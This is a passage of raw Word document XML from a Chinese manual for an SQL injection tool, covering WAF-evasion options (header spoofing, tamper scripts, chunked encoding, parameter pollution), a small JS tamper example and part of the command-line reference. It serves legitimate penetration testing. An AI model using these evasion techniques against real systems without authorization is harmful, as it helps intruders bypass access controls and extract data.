        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8009"/>
          </w:tcPr>
          <w:p w14:paraId="669B7C34">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>固定延时、随机延时、限速、随机 UA（指纹混淆）、随机源 IP（伪造 X-Forwarded-For / X-Real-IP / Client-IP 头，绕过基于 IP 的访问控制与频率限制）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1735"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="27470860">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>字符替换</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8009"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="28B4B6F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>payload 级字符串替换规则，支持正则与"编码前处理"，等价于常见的替换类 tamper 脚本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1735"/>
          </w:tcPr>
          <w:p w14:paraId="5D403EAC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>编码处理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8009"/>
          </w:tcPr>
          <w:p w14:paraId="6A49912E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>内置编码工具链</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">（C# 实现：URL 双重编码、大小写随机、注释混淆、空格变异、十六进制等，可多选链式组合）+ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>自定义 JS 脚本</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">（QuickJS 引擎，实现 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>function tamper(payload)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 接口即可，脚本可视化管理）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1735"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="4935FD00">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>动态规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8009"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="789E3E26">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">动态值与二次注入统一规则管理（原"伴随请求"，内嵌"动态规则 / 脚本管理"两个子选项卡）：动态值规则从 HTTP 响应抓取或脚本生成动态值回填 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>&lt;DRule&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 标记（CSRF token / 防重放 / API 签名），可多条同时启用；二次注入规则以回显页响应替代主响应取数，同时只能启用一条；脚本管理子选项卡维护全部动态值脚本（分</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>请求抓取 / 自主生成</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>两类型）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1735"/>
          </w:tcPr>
          <w:p w14:paraId="2A811070">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Chunked / HPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8009"/>
          </w:tcPr>
          <w:p w14:paraId="0AE01926">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HTTP 分块传输编码（随机大小多块，切点可落在 SQL 关键字中间）与参数污染开关（覆盖 Query 与 body 参数位，自动修正 Content-Length）、参数名大小写混淆（注入参数名每请求随机大小写，绕过参数级 WAF）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E549CF8">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="656A9C36">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>自定义 JS tamper 示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C739348">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function tamper(payload) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E56ED0">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 xml:space="preserve">    return payload.replace(/ /g, '/**/');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5E08D2">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCA168A">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="458BF962">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 9 章 工具页（取数模版 / 编码工具 / 请求日志）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A604708">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>9.1 取数模版</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096CD9B0">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">各数据库 × 各注入类型的取数 SQL 模板（版本、库表列、文件、命令等）可视化查看与维护。模板文件位于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>config/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 目录，熟悉 SQL 注入语句的用户可直接扩展新数据库或定制语句。模板的命名占位符说明与完整词汇表收在工具栏右侧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>问号图标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>的悬停提示中（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{expr}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{cols}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{db}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>{table}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等槽位含义一览），不再占用页面空间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA813DA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>9.2 编码工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C791C0E">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>独立的编码 / 解码小工具：URL、Base64、Hex、HTML 实体、Unicode、MD5 等常用变换，便于手工分析 payload 与回显。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3DC9EE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>9.3 请求日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4BDA64">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>全部 HTTP 请求 / 响应留痕，支持按时间 / 目标过滤、查看完整报文、回放单条请求，是排查"检测为什么没中"的第一入口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0EC7C0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 10 章 命令行 SuperSQLInjectionV2.Cmd 完整参考</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BE0654">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>10.1 参数总表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F52AE8">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>目标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2151"/>
        <w:gridCol w:w="7594"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2151"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="306F229A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7593"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="5536FF54">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2151"/>
          </w:tcPr>
          <w:p w14:paraId="5C96F1B2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-u URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7593"/>
          </w:tcPr>
          <w:p w14:paraId="4F66FDE6">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>目标 URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2151"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="4ADF95B6">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-r FILE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7593"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="44289422">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>从文件加载原始 HTTP 报文（复杂头 / Cookie / JSON / XML 注入点必选）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2151"/>
          </w:tcPr>
          <w:p w14:paraId="7F654E0E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--data=DATA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7593"/>
          </w:tcPr>
          <w:p w14:paraId="4E16B77C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST 数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2151"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="23E71850">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--cookie=COOKIE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7593"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="2F400264">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cookie 头</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2151"/>
          </w:tcPr>
          <w:p w14:paraId="4B2BE1B6">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--header=HEADER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7593"/>
          </w:tcPr>
          <w:p w14:paraId="6C9A8330">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>自定义请求头（可多次指定）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2151"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="0D5F6C9C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--method=METHOD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7593"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="31930654">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>强制 HTTP 方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2151"/>
          </w:tcPr>
          <w:p w14:paraId="000B55CC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-p PARAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7593"/>
          </w:tcPr>
          <w:p w14:paraId="787D3ACE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>指定测试参数（默认全部可注入参数）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E9DA7C4">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60055312">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2526"/>
        <w:gridCol w:w="7219"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2526"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="5D66AB4C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7218"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="56574F9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2526"/>
          </w:tcPr>
          <w:p w14:paraId="72503C40">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--level=1-5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7218"/>
          </w:tcPr>
          <w:p w14:paraId="4E3FC3DC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>检测级别（默认 1）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2526"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="711075A4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--risk=1-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7218"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="4C84FE6E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>风险级别（默认 1）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2526"/>
          </w:tcPr>
          <w:p w14:paraId="62B972B4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--technique=BEUTSD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7218"/>
          </w:tcPr>
          <w:p w14:paraId="22BDDEE2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>指定检测技术组合（B布尔 E报错 U联合 T时间 S堆叠 D DNS外带）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2526"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="2DEFF63A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
